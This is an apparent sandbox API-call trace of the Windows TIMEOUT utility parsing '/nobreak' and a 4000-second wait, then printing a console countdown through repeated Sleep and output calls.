[0085.858] _vsnwprintf (in: _Buffer=0x302818, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x28f7d0 | out: _Buffer="Type \"TIMEOUT /?\" for usage.") returned 28
[0085.858] SetLastError (dwErrCode=0x0)
[0085.859] GetThreadLocale () returned 0x409
[0085.859] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0085.859] lstrlenW (lpString="?") returned 1
[0085.859] GetThreadLocale () returned 0x409
[0085.859] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0085.859] GetThreadLocale () returned 0x409
[0085.859] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0085.859] lstrlenW (lpString="nobreak") returned 7
[0085.859] SetLastError (dwErrCode=0x0)
[0085.859] SetLastError (dwErrCode=0x0)
[0085.859] lstrlenW (lpString="4000") returned 4
[0085.859] lstrlenW (lpString="-/") returned 2
[0085.859] StrChrIW (lpStart="-/", wMatch=0x34) returned 0x0
[0085.859] SetLastError (dwErrCode=0x490)
[0085.859] SetLastError (dwErrCode=0x490)
[0085.859] SetLastError (dwErrCode=0x0)
[0085.859] lstrlenW (lpString="4000") returned 4
[0085.859] StrChrIW (lpStart="4000", wMatch=0x3a) returned 0x0
[0085.859] SetLastError (dwErrCode=0x490)
[0085.859] SetLastError (dwErrCode=0x0)
[0085.859] _memicmp (_Buf1=0x2ff240, _Buf2=0x1811e8, _Size=0x7) returned 0
[0085.859] lstrlenW (lpString="4000") returned 4
[0085.859] lstrlenW (lpString="4000") returned 4
[0085.859] lstrlenW (lpString=" \x09") returned 2
[0085.859] StrChrW (lpStart=" \x09", wMatch=0x34) returned 0x0
[0085.859] StrChrW (lpStart=" \x09", wMatch=0x34) returned 0x0
[0085.859] StrChrW (lpStart=" \x09", wMatch=0x30) returned 0x0
[0085.859] StrChrW (lpStart=" \x09", wMatch=0x30) returned 0x0
[0085.860] StrChrW (lpStart=" \x09", wMatch=0x30) returned 0x0
[0085.860] GetLastError () returned 0x0
[0085.860] lstrlenW (lpString="4000") returned 4
[0085.860] lstrlenW (lpString="4000") returned 4
[0085.860] SetLastError (dwErrCode=0x0)
[0085.860] _errno () returned 0x5507d8
[0085.860] wcstol (in: _String="4000", _EndPtr=0x28f9f8, _Radix=10 | out: _EndPtr=0x28f9f8*="") returned 4000
[0085.860] lstrlenW (lpString="") returned 0
[0085.860] _errno () returned 0x5507d8
[0085.860] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb1
[0085.860] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0085.860] GetFileType (hFile=0x3) returned 0x2
[0085.860] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x28f988 | out: lpMode=0x28f988) returned 1
[0085.860] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0085.860] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x28fa04 | out: lpMode=0x28fa04) returned 1
[0085.860] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a1) returned 1
[0085.861] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x28f9fc | out: lpNumberOfEvents=0x28f9fc) returned 1
[0085.861] FlushConsoleInputBuffer (hConsoleInput=0x3) returned 1
[0085.861] _memicmp (_Buf1=0x2ff228, _Buf2=0x1811e8, _Size=0x7) returned 0
[0085.861] LoadStringW (in: hInstance=0x0, uID=0x98, lpBuffer=0x3028c0, cchBufferMax=256 | out: lpBuffer="\nWaiting for %*lu") returned 0x11
[0085.861] lstrlenW (lpString="\nWaiting for %*lu") returned 17
[0085.861] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="\nWaiting for %*lu", _ArgList=0x28f98c | out: _Buffer="\nWaiting for 4000") returned 17
[0085.861] __iob_func () returned 0x757a2900
[0085.861] _fileno (_File=0x757a2920) returned 1
[0085.862] _errno () returned 0x5507d8
[0085.862] _get_osfhandle (_FileHandle=1) returned 0x4c
[0085.862] _errno () returned 0x5507d8
[0085.862] GetFileType (hFile=0x4c) returned 0x2
[0085.862] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0085.862] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0085.862] lstrlenW (lpString="\nWaiting for 4000") returned 17
[0085.862] GetConsoleOutputCP () returned 0x1b5
[0085.862] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\nWaiting for 4000", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17
[0085.862] GetConsoleOutputCP () returned 0x1b5
[0085.862] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\nWaiting for 4000", cchWideChar=17, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\nWaiting for 4000", lpUsedDefaultChar=0x0) returned 17
[0085.862] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 17
[0085.863] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0085.863] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0085.863] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4c, lpConsoleScreenBufferInfo=0x28f9a0 | out: lpConsoleScreenBufferInfo=0x28f9a0) returned 0
[0085.863] _memicmp (_Buf1=0x2ff228, _Buf2=0x1811e8, _Size=0x7) returned 0
[0085.863] LoadStringW (in: hInstance=0x0, uID=0xa0, lpBuffer=0x3028c0, cchBufferMax=256 | out: lpBuffer=" seconds, press a key to continue ...") returned 0x25
[0085.863] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37
[0085.863] __iob_func () returned 0x757a2900
[0085.863] _fileno (_File=0x757a2920) returned 1
[0085.863] _errno () returned 0x5507d8
[0085.863] _get_osfhandle (_FileHandle=1) returned 0x4c
[0085.863] _errno () returned 0x5507d8
[0085.863] GetFileType (hFile=0x4c) returned 0x2
[0085.863] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0085.863] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0085.864] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37
[0085.864] GetConsoleOutputCP () returned 0x1b5
[0085.864] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" seconds, press a key to continue ...", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37
[0085.864] GetConsoleOutputCP () returned 0x1b5
[0085.864] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" seconds, press a key to continue ...", cchWideChar=37, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" seconds, press a key to continue ...", lpUsedDefaultChar=0x0) returned 37
[0085.864] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 37
[0085.864] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0085.864] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0085.864] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb1
[0085.864] Sleep (dwMilliseconds=0x64)
[0086.031] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0086.031] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb2
[0086.031] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083999") returned 8
[0086.031] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0086.031] __iob_func () returned 0x757a2900
[0086.031] _fileno (_File=0x757a2920) returned 1
[0086.031] _errno () returned 0x5507d8
[0086.031] _get_osfhandle (_FileHandle=1) returned 0x4c
[0086.031] _errno () returned 0x5507d8
[0086.031] GetFileType (hFile=0x4c) returned 0x2
[0086.031] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0086.031] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0086.032] lstrlenW (lpString="\x08\x08\x08\x083999") returned 8
[0086.032] GetConsoleOutputCP () returned 0x1b5
[0086.032] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083999", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0086.032] GetConsoleOutputCP () returned 0x1b5
[0086.032] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083999", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083999", lpUsedDefaultChar=0x0) returned 8
[0086.032] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0086.032] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0086.032] Sleep (dwMilliseconds=0x64)
[0086.152] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0086.152] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb2
[0086.152] Sleep (dwMilliseconds=0x64)
[0086.305] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0086.306] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb2
[0086.306] Sleep (dwMilliseconds=0x64)
[0086.568] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0086.568] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb2
[0086.568] Sleep (dwMilliseconds=0x64)
[0086.715] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0086.715] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb2
[0086.715] Sleep (dwMilliseconds=0x64)
[0086.885] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0086.885] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb2
[0086.885] Sleep (dwMilliseconds=0x64)
[0087.073] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0087.073] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb3
[0087.073] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083998") returned 8
[0087.073] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0087.073] __iob_func () returned 0x757a2900
[0087.073] _fileno (_File=0x757a2920) returned 1
[0087.073] _errno () returned 0x5507d8
[0087.073] _get_osfhandle (_FileHandle=1) returned 0x4c
[0087.073] _errno () returned 0x5507d8
[0087.073] GetFileType (hFile=0x4c) returned 0x2
[0087.073] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0087.073] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0087.073] lstrlenW (lpString="\x08\x08\x08\x083998") returned 8
[0087.073] GetConsoleOutputCP () returned 0x1b5
[0087.073] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083998", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0087.073] GetConsoleOutputCP () returned 0x1b5
[0087.074] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083998", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083998", lpUsedDefaultChar=0x0) returned 8
[0087.074] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0087.074] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0087.074] Sleep (dwMilliseconds=0x64)
[0087.260] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0087.260] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb3
[0087.260] Sleep (dwMilliseconds=0x64)
[0087.447] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0087.447] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb3
[0087.447] Sleep (dwMilliseconds=0x64)
[0087.635] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0087.635] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb3
[0087.635] Sleep (dwMilliseconds=0x64)
[0087.837] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0087.837] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb3
[0087.837] Sleep (dwMilliseconds=0x64)
[0088.024] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0088.024] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb4
[0088.025] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083997") returned 8
[0088.025] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0088.025] __iob_func () returned 0x757a2900
[0088.025] _fileno (_File=0x757a2920) returned 1
[0088.025] _errno () returned 0x5507d8
[0088.025] _get_osfhandle (_FileHandle=1) returned 0x4c
[0088.025] _errno () returned 0x5507d8
[0088.025] GetFileType (hFile=0x4c) returned 0x2
[0088.025] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0088.025] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0088.025] lstrlenW (lpString="\x08\x08\x08\x083997") returned 8
[0088.025] GetConsoleOutputCP () returned 0x1b5
[0088.025] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083997", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0088.026] GetConsoleOutputCP () returned 0x1b5
[0088.026] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083997", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083997", lpUsedDefaultChar=0x0) returned 8
[0088.026] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0088.026] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0088.026] Sleep (dwMilliseconds=0x64)
[0088.196] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0088.196] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb4
[0088.196] Sleep (dwMilliseconds=0x64)
[0088.383] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0088.383] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb4
[0088.383] Sleep (dwMilliseconds=0x64)
[0088.555] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0088.555] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb4
[0088.555] Sleep (dwMilliseconds=0x64)
[0088.710] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0088.711] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb4
[0088.711] Sleep (dwMilliseconds=0x64)
[0088.898] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0088.898] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb4
[0088.898] Sleep (dwMilliseconds=0x64)
[0089.085] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0089.085] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb5
[0089.085] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083996") returned 8
[0089.085] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0089.085] __iob_func () returned 0x757a2900
[0089.085] _fileno (_File=0x757a2920) returned 1
[0089.085] _errno () returned 0x5507d8
[0089.086] _get_osfhandle (_FileHandle=1) returned 0x4c
[0089.086] _errno () returned 0x5507d8
[0089.086] GetFileType (hFile=0x4c) returned 0x2
[0089.086] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0089.086] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0089.086] lstrlenW (lpString="\x08\x08\x08\x083996") returned 8
[0089.086] GetConsoleOutputCP () returned 0x1b5
[0089.086] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083996", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0089.086] GetConsoleOutputCP () returned 0x1b5
[0089.086] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083996", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083996", lpUsedDefaultChar=0x0) returned 8
[0089.086] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0089.086] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0089.086] Sleep (dwMilliseconds=0x64)
[0089.272] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0089.272] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb5
[0089.272] Sleep (dwMilliseconds=0x64)
[0089.459] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0089.459] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb5
[0089.460] Sleep (dwMilliseconds=0x64)
[0089.633] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0089.634] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb5
[0089.634] Sleep (dwMilliseconds=0x64)
[0089.818] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0089.818] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb5
[0089.818] Sleep (dwMilliseconds=0x64)
[0090.005] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0090.006] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb6
[0090.006] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083995") returned 8
[0090.006] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0090.006] __iob_func () returned 0x757a2900
[0090.006] _fileno (_File=0x757a2920) returned 1
[0090.006] _errno () returned 0x5507d8
[0090.006] _get_osfhandle (_FileHandle=1) returned 0x4c
[0090.006] _errno () returned 0x5507d8
[0090.006] GetFileType (hFile=0x4c) returned 0x2
[0090.006] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0090.006] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0090.006] lstrlenW (lpString="\x08\x08\x08\x083995") returned 8
[0090.006] GetConsoleOutputCP () returned 0x1b5
[0090.006] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083995", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0090.006] GetConsoleOutputCP () returned 0x1b5
[0090.006] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083995", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083995", lpUsedDefaultChar=0x0) returned 8
[0090.006] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0090.006] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0090.006] Sleep (dwMilliseconds=0x64)
[0090.176] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0090.177] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb6
[0090.177] Sleep (dwMilliseconds=0x64)
[0090.533] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0090.533] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb6
[0090.533] Sleep (dwMilliseconds=0x64)
[0090.651] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0090.651] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb6
[0090.651] Sleep (dwMilliseconds=0x64)
[0090.766] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0090.766] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb6
[0090.766] Sleep (dwMilliseconds=0x64)
[0090.872] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0090.872] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb6
[0090.872] Sleep (dwMilliseconds=0x64)
[0090.972] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0090.973] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb6
[0090.973] Sleep (dwMilliseconds=0x64)
[0091.082] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0091.082] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb6
[0091.082] Sleep (dwMilliseconds=0x64)
[0091.191] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0091.191] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb6
[0091.191] Sleep (dwMilliseconds=0x64)
[0091.300] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0091.301] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb7
[0091.301] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083994") returned 8
[0091.301] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0091.301] __iob_func () returned 0x757a2900
[0091.301] _fileno (_File=0x757a2920) returned 1
[0091.301] _errno () returned 0x5507d8
[0091.301] _get_osfhandle (_FileHandle=1) returned 0x4c
[0091.301] _errno () returned 0x5507d8
[0091.301] GetFileType (hFile=0x4c) returned 0x2
[0091.301] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
